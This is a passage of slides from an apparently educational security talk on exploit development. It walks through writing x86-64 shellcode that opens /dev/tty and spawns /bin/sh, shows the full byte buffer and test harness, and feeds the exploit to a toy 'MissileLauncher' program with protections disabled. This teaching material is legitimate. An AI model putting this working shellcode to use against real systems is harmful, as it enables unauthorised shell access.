  • 84. 84 $ hello shellcode_asm.c // -------------------------------------------------------- // open // -------------------------------------------------------- "xor %rax, %raxnt" // Zero out rax - without using 0 "push %raxnt" // Push a string terminator "movabs $0x7974742f7665642f, %rbxnt" // Put the string in rbx: // /dev/tty = 2f 64 65 76 2f 74 74 79 "push %rbxnt" // Push rbx on the stack "mov %rsp, %rsint" // Put a pointer to the string in rsi "xor %rdx, %rdxnt" // Zero out rdx - without using 0 "xor %rdi, %rdint" // Zero out rdi - without using 0 "xor %r10, %r10nt" // Zero out r10 - without using 0 "mov $0x101, %eaxnt" // Write syscall number 257 to eax "syscallnt" // Do the syscall @pati_gallardo %rax # System call %rdi %rsi %rdx %r10 0x101 257 sys_openat int dfd const char * filename int flags int mode
  • 85. 85 $ hello shellcode_asm.c "mov $0xFF, %alnt" // Write syscall number 255 to al "inc %raxnt" "inc %raxnt" //"mov $0x101, %eaxnt" // Write syscall number 257 to eax %rax # System call %rdi %rsi %rdx %r10 0x101 257 sys_openat int dfd const char * filename int flags int mode @pati_gallardo Write 255 and inc it twice
  • 86. 86 @pati_gallardowargames$ objdump -d shellcode_asm | grep -A 31 "<main>" 0000000000400480 <main>: 400480: 55 push %rbp 400481: 48 89 e5 mov %rsp,%rbp 400484: 48 31 ff xor %rdi,%rdi 400487: 48 31 c0 xor %rax,%rax 40048a: b0 03 mov $0x3,%al 40048c: 0f 05 syscall 40048e: 48 31 c0 xor %rax,%rax 400491: 50 push %rax 400492: 48 bb 2f 64 65 76 2f movabs $0x7974742f7665642f,%rbx 400499: 74 74 79 40049c: 53 push %rbx 40049d: 48 89 e6 mov %rsp,%rsi 4004a0: 48 31 d2 xor %rdx,%rdx 4004a3: 48 31 ff xor %rdi,%rdi 4004a6: 4d 31 d2 xor %r10,%r10 4004a9: b0 ff mov $0xff,%al 4004ab: 48 ff c0 inc %rax 4004ae: 48 ff c0 inc %rax 4004b1: 0f 05 syscall 4004b3: 48 31 d2 xor %rdx,%rdx 4004b6: 48 31 c0 xor %rax,%rax 4004b9: 50 push %rax 4004ba: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx 4004c1: 2f 73 68 4004c4: 53 push %rbx 4004c5: 48 89 e7 mov %rsp,%rdi 4004c8: 52 push %rdx 4004c9: 57 push %rdi 4004ca: 48 89 e6 mov %rsp,%rsi 4004cd: b0 3b mov $0x3b,%al 4004cf: 0f 05 syscall Look at the assembly of main close open execve
  • 87. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 87 @pati_gallardo
  • 88. 88 shellcode_test.c @pati_gallardochar shellcode[] = "x48x31xff" // xor %rdi,%rdi "x48x31xc0" // xor %rax,%rax "xb0x03" // mov $0x3,%al "x0fx05" // syscall "x48x31xc0" // xor %rax,%rax "x50" // push %rax "x48xbbx2fx64x65x76x2f" // movabs $0x7974742f7665642f,%rbx "x74x74x79" // "x53" // push %rbx "x48x89xe6" // mov %rsp,%rsi "x48x31xd2" // xor %rdx,%rdx "x48x31xff" // xor %rdi,%rdi "x4dx31xd2" // xor %r10,%r10 "xb0xff" // mov $0xff,%al "x48xffxc0" // inc %rax "x48xffxc0" // inc %rax "x0fx05" // syscall "x48x31xd2" // xor %rdx,%rdx "x48x31xc0" // xor %rax,%rax "x50" // push %rax "x48xbbx2fx62x69x6ex2f" // movabs $0x68732f2f6e69622f,%rbx "x2fx73x68" // "x53" // push %rbx "x48x89xe7" // mov %rsp,%rdi "x52" // push %rdx "x57" // push %rdi "x48x89xe6" // mov %rsp,%rsi "xb0x3b" // mov $0x3b,%al "x0fx05"; // syscall close open execve Let’s put the bytes in a char buffer
  • 89. 89 $ hello shellcode_close_test.c int main() { printf("len:%lu bytesn", strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; } Let’s run the char buffer @pati_gallardo
  • 90. 90 $ hello$ clang -z execstack -o shellcode_test shellcode_test.c $ ./shellcode_test len:77 bytes $ Compile and test the assembly @pati_gallardo ✔
  • 91. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr Write inline assembly, eliminating zero bytes 91 @pati_gallardo
  • 92. 92 $ hellowargames$ clang -o shellcode_exploit shellcode_exploit.c wargames$ ./shellcode_exploit > file wargames$ gdb -q ./launch_bigger (gdb) r < file Starting program: ./launch_bigger < file WarGames MissileLauncher v0.1 0x7fffffffdc90 Secret: Access denied process 29337 is executing new program: /bin/dash $ Use the exploit in gdb @pati_gallardo ✔
  • 94. 94 $ hellowargames$ ./shellcode_exploit | ./launch_bigger WarGames MissileLauncher v0.1 0x7fffffffdd10 Secret: Access denied $ Use the exploit with pipe @pati_gallardo ✔
  • 96. Cheats - We turned off ASLR - We made the stack executable - We turned off stack canaries - We printed the address of the buffer @pati_gallardo 96
  • 97. Examples of newer exploit techniques - Information Leaks - to defy ASLR - Return Oriented Programming - to defy non-executable stack @pati_gallardo 97
  • 98. The Target The Exploit @pati_gallardo @halvarflake98 Weird State Weird State Programming the Weird Machine Vulnerability @sergeybratus
  • 99. Programs need to be deterministically correct Exploits need to be probabilistically correct 99 @pati_gallardo
  • 100. Exploit Development is Programming the Weird Machine 100 @pati_gallardo
  • 101. Turtle Sec Questions? Inspired by the training (In)Security in C++, Secure Coding Practices in C++ Patricia Aas, TurtleSec @pati_gallardo
  • 102. Turtle Sec Photos from pixabay.com Patricia Aas, TurtleSec @pati_gallardo
  • 104. 104 LINUX SYSTEM CALL TABLE FOR X86 64 http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/ Hex to decimal converter https://www.rapidtables.com/convert/number/hex-to-decimal.html https://www.asciitohex.com Weird machines, exploitability, and provable unexploitability - Thomas Dullien/Halvar Flake https://vimeo.com/252868605 Resources @pati_gallardo